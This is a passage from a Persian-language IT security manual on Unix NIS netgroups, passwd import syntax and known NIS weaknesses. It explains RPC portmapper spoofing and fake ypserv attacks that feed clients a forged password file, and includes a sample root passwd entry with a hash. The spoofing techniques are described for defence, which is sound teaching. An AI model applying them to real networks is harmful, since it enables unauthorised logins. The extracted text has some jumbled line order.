۱۵۸ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ ﺑﮕﻮﻧﻪﺍﻱ ﺳﺎﺧﺘﻪ ﺷﻮﻧﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻫﺮﻳﻚ ﺍﺯ ﺍﻋﻀﺎ ﻳﻚ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ )ﻳﻚ ﮔﺮﻭﻩ ﺷﺒﻜﻪ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ( ،ﻳـﺎ ﻳـﻚ ﻧـﺎﻡ
ﻣﻴﺰﺑﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﻭﻟﻲ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ )ﻳﻚ ﮔﺮﻭﻩ ﺷﺒﻜﻪ ﺍﺯ ﻣﻴﺰﺑﺎﻧﻬﺎ( .ﺳﺎﺧﺘﻦ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺑﻌﻀﻲ ﺍﺯ ﺍﻋﻀﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻫـﺴﺘﻨﺪ ﻭ ﺑﻌـﻀﻲ ﺍﺯ
ﺍﻋﻀﺎ ﻣﻴﺰﺑﺎﻥ ،ﺍﺣﺘﻤﺎﻝ ﺧﻄﺎ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻣﻲﺩﻫﺪ.
٣٣١
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
/etc/yp/domainname/netgroup.dir
/etc/yp/domainname/netgroup.pag
/etc/yp/domainname/netgroup.byuser.dir
/etc/yp/domainname/netgroup.byuser.pag
/etc/yp/domainname/netgroup.byhost.dir
/etc/yp/domainname/netgroup.byhost.pag
ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺩﺭ ﺑﻌﻀﻲ ﻣﺎﺷﻴﻨﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ /etc/ypﺑﺼﻮﺭﺕ ﺳﻤﺒﻠﻴﻚ ﺑﻪ /var/ypﻟﻴﻨﻚ ﺷﺪﻩ ﺑﺎﺷﺪ.
ﺍﮔﺮ ﺳﺎﺯﻣﺎﻥ ﻛﻮﭼﻜﻲ ﺩﺍﺭﻳﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﻨﻬـﺎ ﺩﻭ ﮔـﺮﻭﻩ ﺷـﺒﻜﻪ ﺑـﺴﺎﺯﻳﺪ؛ ﻳﻜـﻲ ﺑـﺮﺍﻱ ﻛﻠﻴـﺔ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ ﺩﻳﮕـﺮﻱ ﺑـﺮﺍﻱ ﻛﻠﻴـﺔ ﻣﺎﺷـﻴﻨﻬﺎﻱ
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ .ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﺍﻳﺠﺎﺩ ﻭ ﺭﺍﻫﺒﺮﻱ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺭﺍ ﺁﺳﺎﻧﺘﺮ ﻣﻲﻛﻨﻨﺪ.
ﻼ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻳﻚ ﮔﺮﻭﻩ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻫﺮ ﺩﭘﺎﺭﺗﻤﺎﻥ ﺑﺴﺎﺯﻳﺪ .ﺁﻧﮕﺎﻩ ﻣـﻲﺗﻮﺍﻧﻴـﺪ
ﺍﮔﺮ ﺳﺎﺯﻣﺎﻥ ﺑﺰﺭﮔﺘﺮﻱ ﺩﺍﺭﻳﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﭼﻨﺪ ﮔﺮﻭﻩ ﺑﺴﺎﺯﻳﺪ .ﻣﺜ ﹰ
ﻳﻚ ﮔﺮﻭﻩ ﺍﺻﻠﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺷﺎﻣﻞ ﻫﻤﺔ ﺯﻳﺮﮔﺮﻭﻫﻬﺎﻱ ﺩﻳﮕﺮ ﺑﺎﺷﺪ .ﺍﻟﺒﺘﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻫﻤﻴﻦ ﻛﺎﺭ ﺭﺍ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﻴﺰ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ.
ﻳﻚ ﺩﭘﺎﺭﺗﻤﺎﻥ ﻋﻠﻮﻡ ﺑﺎ ﺳﺎﺧﺘﺎﺭﻱ ﻣﺸﺎﺑﻪ ﺳﺎﺧﺘﺎﺭ ﺯﻳﺮ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ:
)Math (mathserve,,) (math1,,) (math2,,) (math3,,
)Chemistry (chemserve1,,) (chemserve2,,) (chem1,,) (chem2,,) (chem3,,
)Biology (bioserve1,,) (bio1,,) (bio2,,) (bio3,,
Science Math Chemistry Biology
ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ ﺍﺯ ﺑﻌﺪ ﺍﻣﻨﻴﺖ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﻫﺴﺘﻨﺪ ﭼﻮﻥ ﺷﻤﺎ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻣﺤﺪﻭﺩ ﻛـﺮﺩﻥ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ ﻣﺎﺷـﻴﻨﻬﺎﻳﻲ ﻛـﻪ ﺭﻭﻱ ﺷـﺒﻜﻪ ﺑـﻪ
ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﺓ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ .ﺑﺮﺍﻱ ﻣﺤﺪﻭﺩ ﻛـﺮﺩﻥ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﻭﺍﺭﺩ ﻣـﻲﺷـﻮﻧﺪ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪ ﺩﺭ ﻓﺎﻳﻠﻬﺎﻱ NFSﺑـﺮﺍﻱ ﻣﺤـﺪﻭﺩ ﻛـﺮﺩﻥ ﺍﻳﻨﻜـﻪ ﭼـﻪ ﻛـﺴﻲ ﺑـﻪ partitionﻫـﺎ ﻭ ﻓﺎﻳﻠﻬـﺎﻱ ﺩﺍﺩﻩ ﻧﻈﻴـﺮ
/etc/passwdﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﺩ ﺑﻬﺮﻩ ﺑﺒﺮﻳﺪ.
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﻣﺤﺪﻭﺩﻛﺮﺩﻥ ﻭﺭﻭﺩ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺗﺴﻬﻴﻼﺕ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺍﻳﻨﻜﻪ ﻛﺪﺍﻡ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺑﻮﺳﻴﻠﺔ ﻓﺎﻳﻞ /etc/passwdﻭﺍﺭﺩ ﺷﺪﻩﺍﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ
ﻛﻨﻴﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﻓﻘﻂ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻳﻚ ﮔﺮﻭﻩ ﺷﺒﻜﻪ ﺧﺎﺹ ﺭﺍ ﻭﺍﺭﺩ ﻛﻨﻴﺪ ﺍﺯ ﻋﻼﻣﺖ ﺟﻤﻊ ) (+ﻭ ﻳﻚ ﻧـﺸﺎﻧﻪ @ ﺑـﻪ
ﻫﻤﺮﺍﻩ ﻧﺎﻡ ﮔﺮﻭﻩ ﺷﺒﻜﻪ ﻣﻮﺭﺩ ﻧﻈﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻴﺪ:
ﺩﺳﺘﻮﺭﺍﺕ ﺑﺎﻻ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﺩﺭ ﮔﺮﻭﻩ ﻣﺘﺼﺪﻱﻫﺎ ﻓﻬﺮﺳﺖ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺍﺯ ﻧﮕﺎﺷﺖ NISﺑﻪ ﺣﺎﻓﻈﻪ ﻣﻨﺘﻘﻞ ﻣﻲﻛﻨﻨﺪ .ﻫﻤﭽﻨـﻴﻦ ﺍﮔـﺮ
ﺍﺳﺘﺜﻨﺎﻫﺎ ﺭﺍ ﻗﺒﻞ ﺍﺯ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ ﻓﻬﺮﺳﺖ ﻛﻨﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻋﻼﻣﺖ ﺗﻔﺮﻳﻖ ) (-ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﮔﺮﻭﻫﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﺭﺍ ﻣـﺴﺘﺜﻨﻲ
ﻧﻤﺎﻳﻴﺪ.
ﻧﻤﺎﺩﻫﺎﻱ +@netgroupﻭ -@netgroupﺭﻭﻱ ﻫﻤﺔ ﻧﺴﺨﻪﻫﺎﻱ NISﻛﺎﺭ ﻧﻤﻲﻛﻨﻨﺪ ﻭ ﺗﺎ ﻛﻨﻮﻥ ﺭﻭﻱ ﺑﻘﻴﻪ ﻧﺴﺨﻪﻫﺎ ﻫـﻢ ﺑـﺼﻮﺭﺕ
ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻛﺎﺭ ﻧﻜﺮﺩﻩﺍﻧﺪ .ﺍﮔﺮ ﻗﺼﺪ ﺩﺍﺭﻳﺪ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ،ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺁﻧﻬـﺎ ﻫﻤﺎﻧﮕﻮﻧـﻪ
ﻛﻪ ﺑﺎﻳﺪ ﻋﻤﻞ ﻣﻲﻛﻨﻨﺪ .ﻳﺎﺩﺁﻭﺭﻱ ﻣﻲﺷﻮﺩ ﮐﻪ ﺻﺮﻑ ﺧﻮﺍﻧﺪﻥ ﺍﺳﻨﺎﺩ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﻛﻔﺎﻳﺖ ﻧﻤﻲﻛﻨﺪ.
ﻣﺤﺪﻭﺩﻳﺖﻫﺎﻱ NIS
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ،NISﻧﻘﻄﻪ ﺷﺮﻭﻉ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﺠﺮﺑﻴﺎﺕ ﻣﻮﻓﻖ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ Unixﺑﻮﺩ .ﭼﻮﻥ NISﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﻛﻨﺘـﺮﻝ ﻣـﻲﻛﻨـﺪ،
ﺍﮔﺮ ﺑﺘﻮﺍﻧﻴﺪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ NISﺭﺍ ﻗﺎﻧﻊ ﻛﻨﻴﺪ ﻛﻪ ﺭﻭﻱ ﻛﻞ ﺷﺒﻜﻪ ﺍﻋﻼﻡ ﻛﻨﺪ ﻛﻪ ﺷﻤﺎ ﻳﻚ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺩﺍﺭﻳﺪ ،ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﺁﻥ
ﺑﺨﺶ ﭘﻨﺠﻢ
root:si 4NOjF9Q8JqE:0:1:Mr. Root:/:/bin/sh
+@operators::999:999:::
٣٣٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺁﻥ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ NIS .ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﻪﺍﻱ ﻣﺜـﻞ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﺷﺪﻩ ﺭﺍ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﺩﻫﺪ.
ﺩﺭ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﺨﺘﻠﻒ NISﭼﻨﺪ ﻧﻘﺺ ﻃﺮﺍﺣﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﻪ ﻛﺎﺭﺑﺮ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺳﻴﺴﺘﻢ NISﺭﺍ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﺠﺪﺩ
ﻭ ﮔﻤﺮﺍﻩ ﻛﻨﺪ .ﺍﻳﻦ ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﺑﻪ ﺩﻭ ﺭﻭﺵ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ :ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﺳﻴﺴﺘﻢ ﻓﺮﺍﺧﻮﺍﻧﻲ ﺗﺎﺑﻊ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ،ﻭ ﮔﻤﺮﺍﻩﺳﺎﺯﻱ .NIS
ﮔﻤﺮﺍﻩﺳﺎﺯﻱ RPC
ﻓﺮﺍﺧﻮﺍﻧﻲ ﺗﺎﺑﻊ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ) ١٥٩(RPCﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺗﻮﺍﺑﻊ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻳﮕﺮ ﺭﺍ ﻓﺮﺍﺧﻮﺍﻧﻲ ﻛﻨﻨﺪ .ﺳﻴﺴﺘﻢ
NISﺑﻪ ﻋﻤﻠﻜﺮﺩ ﺳﺮﻭﻳﺴﻬﺎﻱ - RPC portmapperﻳﻚ daemonﻛﻪ ﻧﺎﻣﻬﺎﻱ ﺧـﺪﻣﺎﺕ ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﺑـﺮﺍﻱ RPCﺭﺍ ﺑـﺎ ﺷـﻤﺎﺭﺓ
ﭘﻮﺭﺗﻬﺎﻱ IPﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﺁﻥ ﺧﺪﻣﺎﺕ ﺗﻤﺎﺱ ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩ ﻣﻄﺎﺑﻘﺖ ﻣﻲﺩﻫﺪ -ﻭﺍﺑﺴﺘﻪ ﺍﺳﺖ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻳﻲ ﻛﻪ ﺍﺯ RPCﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻨﺪ ﻭﻗﺘﻲ ﻛﺎﺭﺷﺎﻥ ﺁﻏﺎﺯ ﻣﻲﺷﻮﺩ ﺧﻮﺩ ﺭﺍ ﺑﺎ portmapperﺛﺒﺖ ﻣﻲﻧﻤﺎﻳﻨﺪ ،ﻭ ﺯﻣﺎﻧﻴﻜﻪ ﻛﺎﺭﺷﺎﻥ ﺑﻪ ﭘﺎﻳﺎﻥ ﻣﻲﺭﺳﺪ ﻳﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﺠﺪﺩ
ﻣﻲﮔﺮﺩﻧﺪ ،ﺧﻮﺩﺷﺎﻥ ﺭﺍ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ portmapperﺣﺬﻑ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ.
ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ﺍﻭﻟﻴﺔ portmapperﻫﺮ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻗﺎﺩﺭ ﺑﻮﺩ ﺧﻮﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ RPCﺛﺒـﺖ ﻛﻨـﺪ ،ﻭ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺑـﻪ
ﻣﻬﺎﺟﻤﻴﻦ ﻓﺮﺻﺖ ﻣﻲﺩﺍﺩ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ NISﺧﻮﺩ ﺭﺍ ﺛﺒﺖ ﻛﻨﻨﺪ ﻭ ﺑﺎ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩﺷﺎﻥ ﺑﻪ ﺩﺭﺧﻮﺍﺳـﺘﻬﺎ ﭘﺎﺳـﺦ ﺩﻫﻨـﺪ.
ﺑﻴﺸﺘﺮ ﻧﺴﺨﻪﻫﺎﻱ ﻓﻌﻠﻲ portmapperﺗﻘﺎﺿﺎﻫﺎﻱ ﺛﺒﺖ ﻳﺎ ﺣﺬﻑ ﺧﺪﻣﺎﺕ ﺭﺍ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﺯ ﺩﺳﺘﮕﺎﻩ ﺭﺍﻩ ﺩﻭﺭ ﺁﻣﺪﻩ ﺑﺎﺷﺪ ،ﻳﺎ ﺑﻪ ﻳﻚ ﭘﻮﺭﺕ
ﻣﺠﺎﺯ ﺑﺎﺯﮔﺮﺩﺩ ﻛﻪ ﺍﺯ ﻳﻚ ﺍﺗﺼﺎﻝ ﺷﺮﻭﻉﺷﺪﻩ ﺍﺯ ﻳﻚ ﭘﻮﺭﺕ ﻏﻴﺮﻣﺠﺎﺯ ﻣﻲﺁﻳﺪ ،ﺭﺩ ﻣﻲﻛﻨﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺗﻨﻬﺎ ﻛﺎﺭﺑﺮ ﺍﺻﻠﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﺗﻘﺎﺿـﺎﻫﺎﻳﻲ
ﺑﺮﺍﻱ ﺍﺿﺎﻓﻪ ﻭ ﺣﺬﻑ ﻛﺮﺩﻥ ﻧﮕﺎﺷﺘﻬﺎﻱ ﺧﺪﻣﺎﺕ ﺑﻪ ﭘﻮﺭﺗﻬﺎﻱ ﻣﺠﺎﺯ ﺍﻧﺠﺎﻡ ﺩﻫﺪ ،ﻭ ﺗﻤﺎﻡ ﺗﻘﺎﺿﺎﻫﺎ ﻓﻘﻂ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺼﻮﺭﺕ ﻣﺤﻠـﻲ ﺍﻧﺠـﺎﻡ
ﺷﻮﻧﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻧﺴﺨﻪﻫﺎﻱ portmapper daemonﻣﺮﺑﻮﻁ ﺑﻪ ﻫﻤﺔ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﻳﻦ ﺑﺮﺭﺳﻴﻬﺎ ﺭﺍ ﺍﻧﺠﺎﻡ ﻧﻤﻲﺩﻫﻨﺪ.
ﻻ ﺭﻭﻱ ﭘﻮﺭﺗﻬﺎﻱ ﻏﻴﺮﻣﺠـﺎﺯ ﺛﺒـﺖ ﻣـﻲﺷـﻮﻧﺪ .ﺍﺯ ﻟﺤـﺎﻅ ﻧﻈـﺮﻱ ﺣﺘـﻲ ﺑـﺎ
ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ NFSﻭ ﺑﻌﻀﻲ ﺍﺯ ﺧﺪﻣﺎﺕ NISﻣﻌﻤﻮ ﹰ
ﺑﺮﺭﺳﻴﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺑﺎﻻ ﻓﻬﺮﺳﺖ ﺷﺪ ،ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻜﻲ ﺍﺯ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺭﺍ ﺑﺎ ﻳـﻚ ﺑﺮﻧﺎﻣـﺔ ﻣﺨـﺼﻮﺹ ﺟـﺎﻳﮕﺰﻳﻦ ﻛﻨـﺪ ﺗـﺎ ﺑﺘﻮﺍﻧـﺪ ﺑـﻪ
ﺗﻘﺎﺿﺎﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺑﮕﻮﻧﻪﺍﻱ ﭘﺎﺳﺦ ﺩﻫﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺧﺪﺷﻪﺩﺍﺭ ﮔﺮﺩﺩ.
ﮔﻤﺮﺍﻩﺳﺎﺯﻱ NIS
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﮔﺎﻥ NISﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ،RPCﺍﺯ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ NISﺍﻃﻼﻋﺎﺕ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻨﺪ .ﻳﻚ daemonﻣﺤﻠﻲ ﺑـﻪ ﻧـﺎﻡ
ypbindﺍﻃﻼﻋﺎﺕ ﺗﻤﺎﺱ ﺭﺍ ﺑﺮﺍﻱ daemonﻣﺮﺑﻮﻃﺔ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ NISﺑـﻪ ﻧـﺎﻡ ypservﺩﺭ ﺣﺎﻓﻈـﻪ ﻧﮕـﻪ ﻣـﻲﺩﺍﺭﺩypserv .
ﻣﻲﺗﻮﺍﻧﺪ ﺑﺼﻮﺭﺕ ﻣﺤﻠﻲ ﻳﺎ ﺭﺍﻩ ﺩﻭﺭ ﺍﺟﺮﺍ ﺷﺪﻩ ﺑﺎﺷﺪ.
ﺗﺤﺖ ﻧﺴﺨﻪﻫﺎﻱ ﺍﻭﻟﻴﺔ Sun OSﺍﺯ ﺧﺪﻣﺎﺕ ) NISﻭ ﺍﺣﺘﻤﺎ ﹰﻻ ﻧﺴﺨﻪﻫﺎﻱ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺩﻳﮕﺮ( ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺷﺖ ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻛﻪ ﻣﺜﻞ
ypservﻛﺎﺭ ﻣﻲﻛﻨﺪ ﻭ ﺑﻪ ﺗﻘﺎﺿﺎﻫﺎﻱ ypbindﺟﻮﺍﺏ ﻣﻲﺩﻫﺪ ﺭﺍ instantiateﻛﺮﺩ .ﺩﺭ ﺁﻧـﺼﻮﺭﺕ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ deamonﻣﺤﻠـﻲ
ypbindﻓﺮﻣﺎﻥ ﺩﺍﺩ ﻛﻪ ﺑﺠﺎﻱ ypservﻭﺍﻗﻌﻲ ﺍﺯ ﺁﻥ ﺑﺮﻧﺎﻣﻪ ﻣﺸﺎﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺳﻴﺴﺘﻢ ﺭﺍ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ
ﻛﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻧﺴﺨﺔ ﺧﻮﺩﺵ ﺍﺯ ﻓﺎﻳﻞ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﺮﺍﻱ ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺗﻘﺎﺿﺎﻫﺎﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ!
ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﻓﻌﻠﻲ NISﺍﺯ ypbindﺣﺎﻭﻱ ﻳﻚ ﭘﺎﺭﺍﻣﺘﺮ ﺧﻂ ﻓﺮﻣﺎﻥ -secureﻳﺎ -sﺍﺳﺖ ﻛﻪ ﻫﻨﮕﺎﻡ ﺻﺪﻭﺭ ﺩﺳﺘﻮﺭ ﺷـﺮﻭﻉ ﺑـﻪ ﻛـﺎﺭ
daemonﻣﻲﺗﻮﺍﻧﺪ ﺑﻜﺎﺭ ﺭﻭﺩ .ﺍﮔﺮ ﺍﺯ ﺍﻳﻦ ﭘﺎﺭﺍﻣﺘﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ ypbind daemon ،ﻫﻴﭻ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﺍﺯ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ
ypservﻛﻪ ﺭﻭﻱ ﭘﻮﺭﺗﻬﺎﻱ ﻣﺠﺎﺯ ﺍﺟﺮﺍ ﻧﻤﻲﺷﻮﻧﺪ ﻧﺨﻮﺍﻫﺪ ﭘﺬﻳﺮﻓﺖ .ﻟﺬﺍ ﺍﮔﺮ ﻛﺎﺭﺑﺮﻱ ﺑﺨﻮﺍﻫـﺪ ﻳـﻚ ypserve daemonﺟﻌﻠـﻲ ﻭﺍﺭﺩ
ﺣﺎﻓﻈﻪ ﻛﻨﺪ ﺗﻼﺷﺶ ﻧﺎﺩﻳﺪﻩ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ .ﻣﻌﻤﻮ ﹰ
ﻻ ﺩﻟﻴﻞ ﻗﺎﻧﻊﻛﻨﻨﺪﻩﺍﻱ ﺑﺮﺍﻱ ﻋﺪﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﺭﺍﻣﺘﺮ -secureﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﭘﺎﺭﺍﻣﺘﺮ -secureﺩﺍﺭﺍﻱ ﻳﻚ ﻧﻘﺺ ﺍﺳﺖ .ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ rootﺭﺍ ﺭﻭﻱ ﻫﺮ ﻣﺎﺷﻴﻦ ﺩﻳﮕﺮ ﻣﺘﺼﻞ ﺑﻪ ﺷـﺒﻜﻪ
